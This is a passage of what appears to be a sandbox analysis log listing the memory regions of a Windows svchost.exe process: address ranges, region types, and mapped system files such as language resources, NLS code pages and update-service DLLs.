"" Region: id = 287 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 288 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 289 start_va = 0x140000 end_va = 0x146fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 290 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 291 start_va = 0x170000 end_va = 0x171fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 292 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 293 start_va = 0x190000 end_va = 0x191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 294 start_va = 0x1a0000 end_va = 0x1a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 295 start_va = 0x1b0000 end_va = 0x1c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 296 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 297 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 298 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 299 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 300 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 301 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 302 start_va = 0x5c0000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 303 start_va = 0x680000 end_va = 0x688fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 304 start_va = 0x690000 end_va = 0x693fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 305 start_va = 0x6a0000 end_va = 0x6a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 306 start_va = 0x6b0000 end_va = 0x6b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 307 start_va = 0x6c0000 end_va = 0x6d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 308 start_va = 0x6e0000 end_va = 0x6e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 309 start_va = 0x6f0000 end_va = 0x6fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 310 start_va = 0x700000 end_va = 0x701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 311 start_va = 0x710000 end_va = 0x711fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 312 start_va = 0x720000 end_va = 0x72cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 313 start_va = 0x730000 end_va = 0x736fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 314 start_va = 0x740000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 315 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 316 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 317 start_va = 0x7e0000 end_va = 0x7e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 318 start_va = 0x7f0000 end_va = 0x7fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 319 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 320 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 321 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 322 start_va = 0xc20000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 323 start_va = 0xca0000 end_va = 0xce4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 324 start_va = 0xcf0000 end_va = 0xcf2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 325 start_va = 0xd00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 326 start_va = 0xe00000 end_va = 0xe01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 327 start_va = 0xe10000 end_va = 0xe27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 328 start_va = 0xe30000 end_va = 0xe30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 329 start_va = 0xef0000 end_va = 0xef6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 330 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 331 start_va = 0xf80000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 332 start_va = 0x1000000 end_va = 0x1336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 333 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 334 start_va = 0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 335 start_va = 0x1540000 end_va = 0x163ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 336 start_va = 0x1640000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 337 start_va = 0x16c0000 end_va = 0x173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 338 start_va = 0x1740000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 339 start_va = 0x1840000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 340 start_va = 0x1940000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 341 start_va = 0x1a40000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 342 start_va = 0x1b40000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 343 start_va = 0x1c40000 end_va = 0x1c50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 344 start_va = 0x1c60000 end_va = 0x1c70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 345 start_va = 0x1c80000 end_va = 0x1c90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 346 start_va = 0x1ca0000 end_va = 0x1ca6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 347 start_va = 0x1cb0000 end_va = 0x1cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 348 start_va = 0x1cd0000 end_va = 0x1ce0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 349 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 350 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 351 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 352 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 353 start_va = 0x2100000 end_va = 0x2110fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 354 start_va = 0x2120000 end_va = 0x2147fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 355 start_va = 0x2150000 end_va = 0x2180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 356 start_va = 0x2190000 end_va = 0x2196fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 357 start_va = 0x21a0000 end_va = 0x21b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 358 start_va = 0x21c0000 end_va = 0x21d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 359 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 360 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 361 start_va = 0x2400000 end_va = 0x24dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 362 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 363 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 364 start_va = 0x2700000 end_va = 0x278dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 365 start_va = 0x2790000 end_va = 0x27c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 366 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 367 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 368 start_va = 0x2a00000 end_va = 0x2a30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 369 start_va = 0x2a90000 end_va = 0x2a96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 370 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 371 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 372 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 373 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 374 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 375 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 376 start_va = 0x3100000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 377 start_va = 0x3180000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 378 start_va = 0x3280000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 379 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 380 start_va = 0x3380000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 381 start_va = 0x3480000 end_va = 0x357ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 382 start_va = 0x3580000 end_va = 0x367ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 383 start_va = 0x3680000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 384 start_va = 0x3700000 end_va = 0x377ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 385 start_va = 0x3780000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 386 start_va = 0x38d0000 end_va = 0x394ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038d0000" filename = "" Region: id = 387 start_va = 0x39a0000 end_va = 0x39a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 388 start_va = 0x39b0000 end_va = 0x3aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 389 start_va = 0x3ab0000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ab0000" filename = "" Region: id = 390 start_va = 0x3bb0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 391 start_va = 0x3cb0000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 392 start_va = 0x3d30000 end_va = 0x3daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 393 start_va = 0x3db0000 end_va = 0x3eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 394 start_va = 0x3eb0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 395 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 396 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 397 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 398 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 399 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 400 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 401 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 402 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 403 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 404 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 405 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 406 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 407 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 408 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 409 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 410 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 411 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 412 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 413 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 414 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 415 start_va = 0x5c00000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 416 start_va = 0x5d00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 417 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 418 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 419 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 420 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 421 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 422 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 423 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 424 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 425 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 426 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 427 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 428 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 429 start_va = 0x6b50000 end_va = 0x6b56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b50000" filename = "" Region: id = 430 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 431 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 432 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 433 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 434 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 435 start_va = 0x7300000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 436 start_va = 0x7400000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 437 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 438 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 439 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 440 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 441 start_va = 0x7900000 end_va = 0x79fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 442 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 443 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 444 start_va = 0x8700000 end_va = 0x87fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 445 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 446 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 447 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 448 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 449 start_va = 0x7ff667160000 end_va = 0x7ff66716cfff monitored = 0 entry_point = 0x7ff667163980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 450 start_va = 0x7ff827940000 end_va = 0x7ff827b3ffff monitored = 0 entry_point = 0x7ff8279b5240 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 451 start_va = 0x7ff827eb0000 end_va = 0x7ff827eb7fff monitored = 0 entry_point = 0x7ff827eb13b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 452 start_va = 0x7ff827ec0000 end_va = 0x7ff827ed6fff monitored = 0 entry_point = 0x7ff827ec7520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 453 start_va = 0x7ff827ee0000 end_va = 0x7ff827fb4fff monitored = 0 entry_point = 0x7ff827efcf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 454 start_va = 0x7ff827fc0000 end_va = 0x7ff828003fff monitored = 0 entry_point = 0x7ff827fe83e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 455 start_va = 0x7ff828010000 end_va = 0x7ff828031fff monitored = 0 entry_point = 0x7ff828022540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 456 start_va = 0x7ff828140000 end_va = 0x7ff828157fff monitored = 0 entry_point = 0x7ff82814b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 457 start_va = 0x7ff828160000 end_va = 0x7ff8281bcfff monitored = 0 entry_point = 0x7ff82818e510 region_type = mapped_file name = 